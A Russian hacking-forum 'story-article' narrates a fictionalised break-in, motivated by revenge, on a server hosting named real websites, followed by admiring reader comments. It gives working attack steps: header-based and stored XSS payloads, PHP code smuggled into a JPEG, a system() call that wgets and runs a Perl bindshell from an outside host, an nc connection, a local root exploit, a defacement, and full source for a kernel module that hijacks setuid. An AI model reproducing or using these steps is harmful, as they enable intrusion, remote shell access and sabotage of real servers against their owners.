Story. Полночный взлом. — HackZona.Ru

Story. Полночный взлом.

Story. Полночный взлом.

Тип статьи:
Со старой ХакЗоны.
Источник:
Story. Полночный взлом.
INTRO или вступление.
Салют, читатель! Вот сидел сейчас и думал: какую же все-таки статью лучше написать и пришла мне в голову идея написать
«статью-рассказ». То есть наполовину художественный наполовину технический. В общем смотрите что получилось.


BODY.
Горящие часы на скринсейвере показывали 12:10.
Макс скучал.
В сети почти не кого не было. Лениво просматривая новостную ленту секлаба он уже собирался выключать компьютер,
но тут в онлайн вышел его хороший знакомый kerny.

С ним он познакомился довольно давно. Когда то они состояли в одной тиме, которая впоследствии распалась.

Решив немного поболтать, Макс написал ему. Поговорив на отвлеченные темы, kerny кинул Максиму ссылку на один сайт —
englishrussia.com, отправив при этом несколько ругательств в сторону его создателей.
Пробежавшись по контенту, стало понятно, что смысловая нагрузка ресурса направлена на антироссийскую политику.
Автор активно «обсирал» все, что касается России.
Не сказать, что Макс был патриотом, но было обидно наблюдать, как его родину обливают грязью.
Мысль тут же мелькнула в его голове:

«а почему бы не»

Написав об этом kerny, Максим узнал что тот тоже об этом думал. Но на сайте стоял WordPress 2.7.1, а толковых сплоитов
под него не было. Делать было нечего, а спать не хотелось, поэтому Макс решил копнуть глубже и посмотреть этот ресурс
под более сильным зумом.… Несмотря на отрытое окно в комнате было жарко. Сходив за газировкой Максим начал изучение
сайта. Воспользовавшись инструментов madnet a «Google madnet Scaner», он просканировал ресурс. Скрипт определил, что
на сервере находится еще один сайт — pixdaus.com.
Он представлял из себя что-то вроде хостинга для фотографий.

«Угу, тут то можно найти дыру, для начала стоит поискать админку»

Сразу проверив адреса ...

www.pixdaus.com/admin<br>
www.pixdaus.com/admin.php<br><br>
… Макса ждало разочарование «Ошибка 404», страниц не существовало.
Тогда он попробовал найти админ-панель через Google:

site: pixdaus.com admin.<br><br>
К сожалению и это не помогло.
Но беглый осмотр движка дал свои плоды.
После обращения к адресу:


index.php?fun=66'&from=favourites<br><br>
Сайт выдавал кучу непонятной информации. Макс обрадовался, предвкушая «легкую скулю» но как выяснилось он ошибся. К sql инъекциям
это отношение не имело. Сервер похоже выплевывал http заголовки входящего и еще кое-что непонятное.Вот кусок того, что увидел Максим:
HTTP_USER_AGENT=Mozilla/5.0 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072807 ASPLinux/3.0.1-1.0.140asp<br> FirefHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>

«Возможно здесь есть место xss»

Открыв плагин «LiveHTTPHeaders», Макс изменил заголовок.
Он ввел в поле HTTP_USER_AGENTнебольшой скрипт:
<br>
HTTP_USER_AGENT: [script]alert(/fuke in/)[/script]<br>

В ответ на это он увидел сообщение с текстом «/fukein/»

«Такс… уже кое-что, но с такой xss мало что реализуешь»

Поизучав еще немного те данные, которые выплюнул сервер, взломщик обнаружил интересную фичу:

.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site:www.asu.ru admin<br><br>
«Это ведь тот запрос, который я отдавал в гугл! Может удастся получить активку?»

Улыбнувшись, Макс вбил в Google такой запрос

site: pixdaus.com document [script]alert(/fuke in/)[/script]<br><br>
Но результат был нулевым.
Поисковик не мог найти на сайте все содержимое запроса.

«Значит нужно кое-что урезать»

Немного помозговав, Максим сделал так:

site:www.asu.ru document -[script]alert(/fuke in/)[/script]"<br><br>
Зайдя по одной из ссылок, он вернулся к странице с уязвимостью.
Обновив, ее он увидел знакомое сообщение.

«Ну что ж, активная xss уже неплохо, но оставим это на крайний случай».

Погуляв по страницам сайта, Макс нашел форму для регистрации.
Создав новый аккаунт, взломщик заметил, что есть возможность заливать фотографии на сервер.
«Хм а что если возможно выполнить php код?»

Записав в файл небольшой скрипт, Максим переименовал его так:

photo.php.jpg<br><br>
Но смена расширение не дала результатов.
Макс хотел уже оставить идею с картинкой, но решил попробовать еще один способ.
Открыв картинку в программе WinHex и перейдя в конец файла, он нашел значения «FF D9» и затер их нулями. После этого он вставил
свой php код в конец файла в формате ascii. А значения FF D9 добавил после кода.

«Ну что ж попробуем»

Загрузив фотографию, Макс был приятно удивлен. Код в jpg картинке работал.

…Откинувшись на спинку кресла, Максим закрыл глаза ладонями.
Он всегда так делал после наряженной работы.

«Пора что-нибудь поесть и отдохнуть заодно»

Резко встав с кресла, Макс отправился на кухню.
Кот сидевший рядом тут же рванул за ним, надеясь что хозяин поделится с ним.

Пока кипел чайник, Максим сделал себе бутерброд с сыром, дав кусочек коту.

Последнее время жизнь складывалась не лучшим образом. Все друзья и знакомые отворачивались от него. Хотя нет У него были друзья,

но только в сети.Только их он считал настоящими друзьями.
Один институтский товарищ как-то сказал ему:

«Со своими компьютерами ты когда-нибудь до суицида доиграешься»

Максим не принимал эти слова всерьез или просто не хотел принимать.
С каждым днем он все глубже и глубже погружался в виртуальный мир.
Забывая при этом реальный. Последние 4 месяца Макс редко выходил из квартиры. Если выходил, то только купить пачку чая и
-нибудь полуфабрикат.«Ладно, хватит. Завтра схожу в парк, прогуляюсь» — подумал он, прогоняя тревожные мысли.

В этот момент чайник пикнул, информируя о том, что вода вскипела.
Максим распечатал пачку зеленого чая и насыпал заварку в кружку.
Он страдал гипертонией, и врачи рекомендовали пить зеленый чай для нормализации давления.
Прихватив бутерброд, Макс отправился в свою комнату. На экране уже появился скринсейвер с горящими часами. Они показывали 12:59.
За окном слышались гогот пьяной молодежи.

«Бля, им обязательно бухать около моего дома?»

Дожевывая бутерброд, Максим нажал пару раз на Enter, избавляясь от заставки.

…Включив своего любимого «Карандаша» он подумал:

«Итак, у нас есть возможность выполнять php код, теперь стоит залить биндшелл на сервер, для более удобной работы»

Открыв картинку еще раз Макс дописал такой код:

[? system (cd /tmp; wget http://stanger.hr/bind.pl;chmod 755 bind.pl; perl bind.pl );?]<br><br>
Это должно было загрузить и запустить bindshell на Perl.
Запустив консоль, Максим набрал:

nc 66.90.103.79 21656/>


И скрестив пальцы, стал ждать. Была опасность, что файрвол будет резать подключения и придется делать бэкконнект. Но к счастью
подключение произошло удачно. У Макса был шелл доступ.

Первым делом команда who...

[STR]$ who<br>
  FraCrEx :0          2009-07-02 1.05<br>
… показала что мы одни в системе.

«Отлично, теперь можно не торопиться, интересно какие у нас права»

[STR]$ id<br>
  uid=10(FraCrEx) gid=10(FraCrEx) группы=10FraCrEx) context=unconfined_u:system_r:hotplug_t:s0-s0:c0.c1023<br>
На счастье uname показала, что на сервере крутилась Linux 2.6.30.
Под него был недавно написан эксплоит, который можно найти здесь

Залив исходник на сервер Макс попытался его скомпилировать.

[STR]$gcc sploit sploit.c<br><br>
Но компилятор упорно не хотел собирать программу.

Открыв код, взломщик нашел то, что мешало компиляции.
Во-первых, в условии была синтаксическая ошибка:

If(result=NULL)<br>
  {action}<br><br>
Во вторых, главная функция не принимало аргументов, хотя в ходе эксплоита они использовались.

К тому же в начале кода присутствовала такая строка:

System("rm fr *")<br><br>
«Очевидно, разработчик хотел отпугнуть скрипт-кидди»

После исправления ошибок, эксплоит успешно скомпилировался и Макс получил Root.
Увлекшись взломом, он забыл о главной цели сайт с антироссийским содержанием.

«Теперь можно устроить маленькую месть»

Найдя на сервере нужные файлы, взломщик повесил простенький дефейс

Можно было потереть всю базу сайта, но Максим отказался от этой идеи.

«Хм… админа так и нет. Как бы еще напакостить?»

Тут Максу пришла одна идея.

«Что если подшутить над админом?
Пусть root пользователь сможет войти только с правами nobody, а все остальные наоборот root»

Для этого нужно было подключить к ядру модуль с нужным кодом.
Порывшись у себя в файлах, Макс нашел исходник, который реализует весь прикол:

#define __KERNEL__<br>
  #define MODULE<br>
   <br>
  #include <linux/config.h><br>
  #include <linux/module.h><br>
  #include <linux/version.h><br>
  #include <sys/syscall.h><br>
  #include <linux/sched.h><br>
  #include <linux/types.h><br>
  extern void *sys_call_table[]; <br>
  int (*orig_setuid)(uid_t);<br>
  int change_setuid(uid_t uid)<br>
  {<br>
    switch (uid)<br>
    {<br>
      case 0:<br>
        current->uid = 99;  <br>
        current->euid = 99; <br>
        current->gid = 99; <br> 
        current->egid = 99; <br>
        break;<br>
      default:<br>
        current->uid = 0;   <br>
        current->euid = 0;  <br>
        current->gid = 0;  <br>
        current->egid = 0;<br>
        break;<br>
    }<br>
    return 0;  <br>
  }<br>
  int init_module(void)<br>
  {<br>
     orig_setuid = sys_call_table[__NR_setuid32];<br>
     sys_call_table[__NR_setuid32] = change_setuid;<br>
     return 0;  <br>
  }<br>
  void cleanup_module(void)<br>
  {<br>
     sys_call_table[__NR_setuid32] = orig_setuid; <br>
  }<br>
Скомпилировал его:

[STR]$ gcc -o code.o -c code.c<br><br>
Далее скопировал в каталог /lib/midules

cp code.o /lib/modules<br><br>
И загрузил в ядро

insmod code.o<br><br>
«Пусть админ побесится»

Закрыв окно терминала, Максим устало взглянул на часы.
Было 2:23.
Отправив kerny в оффлайн сообщение об удачном дефейсе, он выключил компьютер.
Можно было идти спать.
Спихнув с софы кота, Макс упал на подушку и заснул.

UTRO или послесловие
В этом рассказе я позволил себе маленький эксперимент. Я взял что-то из реальности, что то сам выдумал и на основе этого составил весь текст. В любом случае, приведенные в рассказе уязвимости встречались мне реально.Кстати, дело в том, что у меня нет даже среднего образования, так что прошу прощения за мою некрасивую речь.Ну, вот и все. Жду комментариев и жесткой критики.Ps Кота звали «Степа»Более красивое оформление

©StraNgeR — Статья написана специально для GR-TEAM
Нравится
Не нравится

18 комментариев

19:44
млин подпись закосячила
20:06
я думал фишка в ней... щас всё сделаем )
20:10
о, шур большой фенкс
01:47
Классная статья)
Мне понравилось...над будет как нить всем собраться, книгу написать ;)
13:59
--StraNger-- умница) Хорошо написано)
15:44
Отлично.
14:12
Очень красиво написанно)Молодец
17:49
хм..интересней читать чем обычну. статью!
14:22
Классная статейка!
Если б так все писали в примерах много больше понятней было б.
18:40
б*я! какой ***. мне четверку поставил ? ппц на рекорд ведь шёлл
12:56
погоричился чтото
15:17
омайгадэбл))) стрэндж не кипятись) оценка это хуйня, завидуют просто...
14:12
отлично написано !
18:46
Отличная статья:)уууее;))
18:08
уууууууххххх блиииинннн суупер ты просто гений)))) тебе надо пэмы хакерские печатать)
19:36
я твой фан)))
15:49
Отличная статья! +5
16:56
Класс!Красава!